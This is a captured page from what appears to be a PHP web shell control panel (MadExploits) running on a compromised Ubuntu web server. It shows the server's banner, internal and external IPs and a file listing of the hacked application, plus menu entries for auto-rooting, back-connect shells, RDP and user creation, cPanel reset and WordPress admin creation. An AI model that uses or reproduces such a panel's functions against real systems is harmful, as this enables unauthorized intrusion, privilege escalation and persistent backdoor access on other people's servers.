Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 3.17.145.236
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
empaddress /
[ HOME SHELL ]
Name
Size
Permission
Action
ajaxview.php
510
B
-rw-r--r--
empaddress.php
3.58
KB
-rw-r--r--
empaddress_editor.php
6.32
KB
-rw-r--r--
empaddress_list.php
6.36
KB
-rw-r--r--
view.php
2.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajaxview.php
<?php session_start(); include("../common/functions.php"); include("../common/config.php"); $stmt = $conn->prepare("SELECT * FROM upazila WHERE district_id=?"); $stmt->bind_param("i", $_REQUEST['district_id']); $stmt->execute(); //Result $result = $stmt->get_result(); $json = []; //Data Retriving while($row = $result->fetch_assoc()) { $json[$row['id']] = $row['UpazilaName']; } $stmt->close(); echo json_encode($json); ?>
Close